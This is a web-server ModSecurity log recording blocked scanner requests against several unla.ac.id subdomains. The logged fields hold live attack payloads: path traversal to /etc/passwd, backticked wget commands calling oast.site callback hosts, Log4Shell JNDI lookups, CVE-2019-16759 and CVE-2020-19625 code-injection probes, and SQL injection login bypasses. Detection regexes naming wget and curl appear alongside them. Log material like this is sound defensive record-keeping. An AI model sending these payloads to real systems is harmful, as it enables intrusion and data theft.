[Tue Aug 29 11:34:30.371052 2023] [:error] [pid 1231] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:../../../../etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:../../../../etc/passwd: ../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/blast/nph-viewgif.cgi"] [unique_id "ZO11VsCo-f0AAATPtQUAAAAM"]
[Tue Aug 29 11:34:30.388689 2023] [:error] [pid 1229] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:target_addr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:target_addr: \\x221.1.1.1 `wget http:/cjmn8l5jmimk2adbbnlgojxcxirguuyqc.oast.site/`\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/boaform/admin/formTracert"] [unique_id "ZO11VsCo-f0AAATNJYkAAAAF"]
[Tue Aug 29 11:34:30.403713 2023] [:error] [pid 1254] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:target_addr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:target_addr: \\x221.1.1.1 `wget http:/cjmn8l5jmimk2adbbnlgfwu5oxgco7yc4.oast.site/`\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/boaform/admin/formTracert"] [unique_id "ZO11VsCo-f0AAATmZcQAAAAr"]
[Tue Aug 29 11:34:30.410408 2023] [:error] [pid 1235] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:a. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:a: ${jndi:ldap://${:-334}${:-600}.${hostName}.search.cjmn8l5jmimk2adbbnlg3domf9tux3zkh.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/_search"] [unique_id "ZO11VsCo-f0AAATTmRAAAAAV"]
[Tue Aug 29 11:34:30.412254 2023] [:error] [pid 1237] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:a. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:a: ${jndi:ldap://${:-334}${:-600}.${hostName}.search.cjmn8l5jmimk2adbbnlg4bqap1dtsk553.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/_search"] [unique_id "ZO11VsCo-f0AAATVtRgAAAAZ"]
[Tue Aug 29 11:34:30.419903 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:a. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:a: ${jndi:ldap://${:-334}${:-600}.${hostName}.search.cjmn8l5jmimk2adbbnlgymu5c79uec86h.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/_search"] [unique_id "ZO11VsCo-f0AAATQXgMAAAAO"]
[Tue Aug 29 11:34:30.439570 2023] [:error] [pid 1228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:target_addr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:target_addr: \\x221.1.1.1 `wget http:/cjmn8l5jmimk2adbbnlgcnt5hwny31ak1.oast.site/`\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/boaform/admin/formTracert"] [unique_id "ZO11VsCo-f0AAATMStcAAAAB"]
[Tue Aug 29 11:34:30.452487 2023] [:error] [pid 1277] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:a. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:a: ${jndi:ldap://${:-334}${:-600}.${hostName}.search.cjmn8l5jmimk2adbbnlg6ss46dg3n98t5.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/_search"] [unique_id "ZO11VsCo-f0AAAT9POAAAAA1"]
[Tue Aug 29 11:34:31.425446 2023] [:error] [pid 1297] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subWidgets[0][config][code]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:subWidgets[0][config][code]: echo md5(\\x22CVE-2019-16759\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/ajax/render/widget_tabbedcontainer_tab_panel"] [unique_id "ZO11V8Co-f0AAAUR824AAABI"]
[Tue Aug 29 11:34:31.426947 2023] [:error] [pid 1240] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subWidgets[0][config][code]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:subWidgets[0][config][code]: echo md5(\\x22CVE-2019-16759\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ajax/render/widget_tabbedcontainer_tab_panel"] [unique_id "ZO11V8Co-f0AAATYeDEAAAAd"]
[Tue Aug 29 11:34:31.431203 2023] [:error] [pid 1250] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subWidgets[0][config][code]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:subWidgets[0][config][code]: echo md5(\\x22CVE-2019-16759\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/ajax/render/widget_tabbedcontainer_tab_panel"] [unique_id "ZO11V8Co-f0AAATiz@YAAAAn"]
[Tue Aug 29 11:34:31.431970 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subWidgets[0][config][code]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:subWidgets[0][config][code]: echo md5(\\x22CVE-2019-16759\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/ajax/render/widget_tabbedcontainer_tab_panel"] [unique_id "ZO11V8Co-f0AAATQXgUAAAAO"]
[Tue Aug 29 11:34:31.434483 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subWidgets[0][config][code]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:subWidgets[0][config][code]: echo md5(\\x22CVE-2019-16759\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/ajax/render/widget_tabbedcontainer_tab_panel"] [unique_id "ZO11V8Co-f0AAAQKOu8AAAAs"]
[Tue Aug 29 11:34:32.322125 2023] [:error] [pid 1293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:query: echo md5(\\x22CVE-2020-19625\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/tests/support/stores/test_grid_filter.php"] [unique_id "ZO11WMCo-f0AAAUNajcAAABF"]
[Tue Aug 29 11:34:32.324985 2023] [:error] [pid 1277] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:query: echo md5(\\x22CVE-2020-19625\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/tests/support/stores/test_grid_filter.php"] [unique_id "ZO11WMCo-f0AAAT9POEAAAA1"]
[Tue Aug 29 11:34:32.329364 2023] [:error] [pid 1296] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ReaderNo. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ReaderNo: `cat/etc/passwd > eekovulpxo.txt`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/card_scan.php"] [unique_id "ZO11WMCo-f0AAAUQ7rAAAABH"]
[Tue Aug 29 11:34:32.332713 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ReaderNo. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ReaderNo: `cat/etc/passwd > eekovulpxo.txt`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/card_scan.php"] [unique_id "ZO11WMCo-f0AAASEJWYAAAAE"]
[Tue Aug 29 11:34:32.334673 2023] [:error] [pid 1228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ReaderNo. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ReaderNo: `cat/etc/passwd > eekovulpxo.txt`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/card_scan.php"] [unique_id "ZO11WMCo-f0AAATMStkAAAAB"]
[Tue Aug 29 11:34:32.336718 2023] [:error] [pid 1285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subWidgets[0][config][code]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:subWidgets[0][config][code]: echo md5(\\x22CVE-2019-16759\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/ajax/render/widget_tabbedcontainer_tab_panel"] [unique_id "ZO11WMCo-f0AAAUFdeYAAAA9"]
[Tue Aug 29 11:34:32.339588 2023] [:error] [pid 1256] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ReaderNo. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ReaderNo: `cat/etc/passwd > eekovulpxo.txt`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/card_scan.php"] [unique_id "ZO11WMCo-f0AAATovmMAAAAt"]
[Tue Aug 29 11:34:32.341419 2023] [:error] [pid 1283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ReaderNo. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ReaderNo: `cat/etc/passwd > eekovulpxo.txt`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/card_scan.php"] [unique_id "ZO11WMCo-f0AAAUDQSAAAAA7"]
[Tue Aug 29 11:34:32.344016 2023] [:error] [pid 1292] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:query: echo md5(\\x22CVE-2020-19625\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/tests/support/stores/test_grid_filter.php"] [unique_id "ZO11WMCo-f0AAAUMVL8AAABE"]
[Tue Aug 29 11:34:32.348741 2023] [:error] [pid 1294] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:query: echo md5(\\x22CVE-2020-19625\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/tests/support/stores/test_grid_filter.php"] [unique_id "ZO11WMCo-f0AAAUOaS4AAABG"]
[Tue Aug 29 11:34:32.370773 2023] [:error] [pid 1230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:query: echo md5(\\x22CVE-2020-19625\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/tests/support/stores/test_grid_filter.php"] [unique_id "ZO11WMCo-f0AAATOA9AAAAAH"]
[Tue Aug 29 11:34:33.298612 2023] [:error] [pid 1303] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:data[0][host]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:data[0][host]: `/bin/wget http:/cjmn8l5jmimk2adbbnlga34rt49ch8tw6.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/Collector/storagemgmt/apply"] [unique_id "ZO11WcCo-f0AAAUXLhgAAABM"]
[Tue Aug 29 11:34:33.312601 2023] [:error] [pid 1291] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ' = ' found within ARGS:username: admin' or '1' = '1'; -- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/dfsms/"] [unique_id "ZO11WcCo-f0AAAULx7EAAABD"]
[Tue Aug 29 11:34:33.312749 2023] [:error] [pid 1278] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:query: echo md5(\\x22CVE-2020-19625\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/tests/support/stores/test_grid_filter.php"] [unique_id "ZO11WcCo-f0AAAT@KucAAAA2"]
[Tue Aug 29 11:34:33.314549 2023] [:error] [pid 1267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ' = ' found within ARGS:username: admin' or '1' = '1'; -- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/dfsms/"] [unique_id "ZO11WcCo-f0AAATzVHUAAAAx"]
[Tue Aug 29 11:34:33.323545 2023] [:error] [pid 1281] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ' = ' found within ARGS:username: admin' or '1' = '1'; -- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/dfsms/"] [unique_id "ZO11WcCo-f0AAAUB00sAAAA5"]
[Tue Aug 29 11:34:33.332012 2023] [:error] [pid 1294] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ' = ' found within ARGS:username: admin' or '1' = '1'; -- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/dfsms/"] [unique_id "ZO11WcCo-f0AAAUOaS8AAABG"]
